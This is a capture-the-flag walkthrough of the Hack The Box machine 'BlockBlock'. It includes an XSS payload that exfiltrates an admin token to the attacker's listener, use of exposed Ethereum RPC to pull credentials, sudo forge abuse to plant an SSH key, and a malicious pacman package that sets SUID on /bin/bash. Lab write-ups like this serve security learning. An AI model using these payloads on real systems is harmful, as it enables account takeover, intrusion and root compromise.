Hackthebox: BlockBlock

Overview

BlockBlock is a hard-difficulty machine from Hack The Box dealing initially with a XSS attack on a chatbot that will allow us to get an admin token where we’ll be abusing exposed Ethereum Blockchain RCP endpoints to get input data of a specific block on the Blockchain containing sensitive credentials. We’ll then abuse forge from foundry which allows us to interact with Solidity Smart Contract to move laterally across the system and finally abuse pacman by creating a malicious package then installing it to get root access

Reconnaissance

PS C:\Users\0xkujen> nmap -A -Pn  10.129.215.46
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-27 15:07 W. Central Africa Standard Time
Nmap scan report for 10.129.215.46
Host is up (0.44s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.7 (protocol 2.0)
| ssh-hostkey:
|   256 d6:31:91:f6:8b:95:11:2a:73:7f:ed:ae:a5:c1:45:73 (ECDSA)
|_  256 f2:ad:6e:f1:e3:89:38:98:75:31:49:7a:93:60:07:92 (ED25519)
80/tcp open  http    Werkzeug httpd 3.0.3 (Python 3.12.3)
|_http-title:          Home  - DBLC
|_http-server-header: Werkzeug/3.0.3 Python/3.12.3

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.73 seconds

We can see that we have our usual ssh port alongside a python web app deployed on port 80. Let’s explore that.

Web Application - http://10.129.215.46

Seems like a casual web app at first with a login, registration, chat and profile features. Let’s register an account and see what we can do:

We are directly redirected to the chat interface where we can interact with the bot and send messages:

But it was not responding to me and didn’t want to give me the flags :(
We could also navigate to http://10.129.215.46/api/contract_source to check the smart contract on the app.
A smart contract is basically a piece of code that organizes our solution and keeps it in check (it basically code lol haha)

One more feature we could use is the report user where we type a username and we get this response:

Hmmmm it says that the moderators will take action, this smells like XSS to me.
Let’s try to do a basic XSS payload to check our thought:

<img src="1" onerror="this.remove(); var s=document.createElement('script'); s.src='http://10.10.16.27'; document.body.appendChild(s);">

This XSS payload attempts to inject and execute a malicious script by first using an invalid image source to trigger the onerror event, which removes the broken image, creates a new <script> element, sets its source to http://10.10.16.10 , and appends it to the document body, forcing the victim’s browser to load and execute the external script.

PS C:\Users\0xkujen> python3 -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:10.129.215.46 - - [27/Mar/2025 15:26:45] "GET / HTTP/1.1" 200 -

And indeed we get a callback! Let’s now create a malicious xss payload to fetch us the moderators cookies:

fetch('/api/info').then(response => response.text()).then(text => {
    fetch('http://10.10.16.27/?log=' + btoa(text), {
        mode: 'no-cors'
    });
});

And we got it:

PS C:\Users\0xkujen> python3 -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:10.129.215.46 - - [27/Mar/2025 15:28:58] "GET /xss.js HTTP/1.1" 200 -
::ffff:10.129.215.46 - - [27/Mar/2025 15:28:58] "GET /?log=eyJyb2xlIjoiYWRtaW4iLCJ0b2tlbiI6ImV5SmhiR2NpT2lKSVV6STFOaUlzSW5SNWNDSTZJa3BYVkNKOS5leUptY21WemFDSTZabUZzYzJVc0ltbGhkQ0k2TVRjME16QTROakk1TWl3aWFuUnBJam9pT1dVMVpqTTFaRE10T1RSa09TMDBPR1F6TFRrelkySXRaRGsxTXpJeE1tUXpZMkkySWl3aWRIbHdaU0k2SW1GalkyVnpjeUlzSW5OMVlpSTZJbUZrYldsdUlpd2libUptSWpveE56UXpNRGcyTWpreUxDSmxlSEFpT2pFM05ETTJPVEV3T1RKOS54WFJSNGJ0Nm1CeFM3OVNNd0VXeGU3UEVKZzJxNkhlZUltSzFLYWFsMGVZIiwidXNlcm5hbWUiOiJhZG1pbiJ9Cg== HTTP/1.1" 200 -

This decrypts to:

{"role":"admin","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTc0MzA4NjI5MiwianRpIjoiOWU1ZjM1ZDMtOTRkOS00OGQzLTkzY2ItZDk1MzIxMmQzY2I2IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImFkbWluIiwibmJmIjoxNzQzMDg2MjkyLCJleHAiOjE3NDM2OTEwOTJ9.xXRR4bt6mBxS79SMwEWxe7PEJg2q6HeeImK1Kaal0eY","username":"admin"}

Let’s now use the admin token to connect to its account:

Now after inserting the admin token, we have access to a new /admin endpoint.
Checking the source code on thad /admin page, we find an interesting /api/json-rpc endpoint, let’s check it out using BurpSuite:

We can see that this endpoint is returning to us an Authorization token in a first request, maybe we’ll use it a bit later. And then there is a second request to the same endpoint but with different data being passed:

From what I can understand, we’re interacting with the Blockchain on the server using RPC endpoints. We’re now sending a request using the eth_getBalance method to get our user’s balance which is returning 0.
Doing some googling, I found this documentation for quicknode where we can see all kinds of methods to interact with the Blockchain. There was one method which is eth_getBlockByNumber which allows us to get information of the block matching the given block number and we must supply it with a block number and a boolean value of true/false which when put to true returns all the transaction objects. So let’s do that against the very first block:

And we do get a return for the second block of the blockchain. Scrolling down a bit we find our input data which is basically HEX for different OP Codes. Once we decode that from HEX using https://cyberchef.io we get a username and what seems like a password for user keira

And we are in with our user flag:

PS C:\Users\0xkujen> ssh keira@10.129.215.46
The authenticity of host '10.129.215.46 (10.129.215.46)' can't be established.
ED25519 key fingerprint is SHA256:Yxhk4seV11xMS6Vp0pPoLicen3kJ7RAkXssZiL2/t3c.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.215.46' (ED25519) to the list of known hosts.
[email protected]'s password:
Last login: Mon Nov 18 17:09:05 2024 from 10.10.14.23
[keira@blockblock ~]$ id
uid=1000(keira) gid=1000(keira) groups=1000(keira)
[keira@blockblock ~]$ cat user.txt
8c600caf991dd048b865a099838f40ae
[keira@blockblock ~]$

Privilege Escalation to root

Lateral Movement to Paul - Forge abuse to arbitrary file write

Checking what we can run with escalated privileges as Keira:

[keira@blockblock ~]$ sudo -l
User keira may run the following commands on blockblock:
    (paul : paul) NOPASSWD: /home/paul/.foundry/bin/forge

We can see that we can run forge from Foundry which allows us to interact with Solidity Smart Contracts.

One interesting feature of forge is the flatten command which flatten a source file and all of its imports into one file. Basically allowing us to read files.

[keira@blockblock ~]$ sudo -u paul /home/paul/.foundry/bin/forge flatten /etc/passwd
[⠃] Compiling...
// /etc/passwd
root:x:0:0::/root:/usr/bin/bash
bin:x:1:1::/:/usr/bin/nologin
daemon:x:2:2::/:/usr/bin/nologin
mail:x:8:12::/var/spool/mail:/usr/bin/nologin
ftp:x:14:11::/srv/ftp:/usr/bin/nologin
http:x:33:33::/srv/http:/usr/bin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/usr/bin/nologin
dbus:x:81:81:System Message Bus:/:/usr/bin/nologin
systemd-coredump:x:980:980:systemd Core Dumper:/:/usr/bin/nologin
systemd-network:x:979:979:systemd Network Management:/:/usr/bin/nologin
systemd-oom:x:978:978:systemd Userspace OOM Killer:/:/usr/bin/nologin
systemd-journal-remote:x:977:977:systemd Journal Remote:/:/usr/bin/nologin
systemd-resolve:x:976:976:systemd Resolver:/:/usr/bin/nologin
systemd-timesync:x:975:975:systemd Time Synchronization:/:/usr/bin/nologin
tss:x:974:974:tss user for tpm2:/:/usr/bin/nologin
uuidd:x:68:68::/:/usr/bin/nologin
polkitd:x:102:102:User for polkitd:/:/usr/bin/nologin
avahi:x:973:973:Avahi mDNS/DNS-SD daemon:/:/usr/bin/nologin
git:x:972:972:git daemon user:/:/usr/bin/git-shell
keira:x:1000:1000::/home/keira:/bin/bash
paul:x:1001:1001::/home/paul:/bin/bash
dhcpcd:x:971:971:dhcpcd privilege separation:/:/usr/bin/nologin

For example we could read the /etc/passwd file.
And we could also output files contents into another file, which is when I thought of outputting my personal public key into paul’s authorized_keys file:

[keira@blockblock ~]$ sudo -u paul /home/paul/.foundry/bin/forge flatten  /tmp/kujen.pub
[⠃] Compiling...
// /tmp/kujen.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILj/fs7I8QFj+se4JCGfFdEr6IDtPR9w1FaBLPnjisMS 0xkujen@kujen

[keira@blockblock ~]$ sudo -u paul /home/paul/.foundry/bin/forge flatten  /tmp/kujen.pub -o /home/paul/.ssh/authorized_keys
[⠃] Compiling...
Flattened file written at /home/paul/.ssh/authorized_keys

And now trying to connect to paul through ssh:

1
2
3

PS C:\Users\0xkujen> ssh [email protected]
[paul@blockblock ~]$ id
uid=1001(paul) gid=1001(paul) groups=1001(paul)

And we’re in!!

Final Lateral Movement to root - pacman abuse

Checking what we can run as root:

[paul@blockblock ~]$ sudo -l
User paul may run the following commands on blockblock:
    (ALL : ALL) NOPASSWD: /usr/bin/pacman

Doing some google searches on possible exploits for pacman, I stumbled upon this blog post https://thecybersimon.com/posts/Privilege-Escalation-via-Pacman/ detailing possible privesc techniques using pacman.
Basically we will be making a malicious pacman packages and providing it with a malicious .install script containing our privesc code (adding SUID to /bin/bash for example), then make the package and execue it using pacman to finally get root access:

[paul@blockblock ~]$ cd /dev/shm
[paul@blockblock shm]$ echo -e "pkgname=exp\npkgver=1.0\npkgrel=1\narch=('any')\ninstall=exp.install" > PKGBUILD
[paul@blockblock shm]$ echo "post_install() { chmod 4777 /bin/bash; }" > exp.install
[paul@blockblock shm]$ makepkg -s
==> Making package: exp 1.0-1 (Thu 27 Mar 2025 03:16:17 PM UTC)
==> Checking runtime dependencies...
==> Checking buildtime dependencies...
==> Retrieving sources...
==> Extracting sources...
==> Entering fakeroot environment...
==> Tidying install...
  -> Removing libtool files...
  -> Purging unwanted files...
  -> Removing static library files...
  -> Stripping unneeded symbols from binaries and libraries...
  -> Compressing man and info pages...
==> Checking for packaging issues...
==> Creating package "exp"...
  -> Generating .PKGINFO file...
  -> Generating .BUILDINFO file...
  -> Adding install file...
  -> Generating .MTREE file...
  -> Compressing package...
==> Leaving fakeroot environment.
==> Finished making: exp 1.0-1 (Thu 27 Mar 2025 03:16:19 PM UTC)
[paul@blockblock shm]$ sudo pacman -U *.zst --noconfirm
loading packages...
resolving dependencies...
looking for conflicting packages...

Packages (1) exp-1.0-1


:: Proceed with installation? [Y/n]
(1/1) checking keys in keyring                                                                [#######################################################] 100%
(1/1) checking package integrity                                                              [#######################################################] 100%
(1/1) loading package files                                                                   [#######################################################] 100%
(1/1) checking for file conflicts                                                             [#######################################################] 100%
(1/1) checking available disk space                                                           [#######################################################] 100%
:: Processing package changes...
(1/1) installing exp                                                                          [#######################################################] 100%
[paul@blockblock shm]$ ls -al /bin/bash
-rwsrwxrwx 1 root root 1112880 Jan 16  2024 /bin/bash
[paul@blockblock shm]$ bash -p
bash-5.2# id
uid=1001(paul) gid=1001(paul) euid=0(root) groups=1001(paul)
bash-5.2# cat /root/root.txt
906da069d604a677968add4838613a8e

And that was basically it for BlockBlock. Hope you enjoyed it!

-0xkujen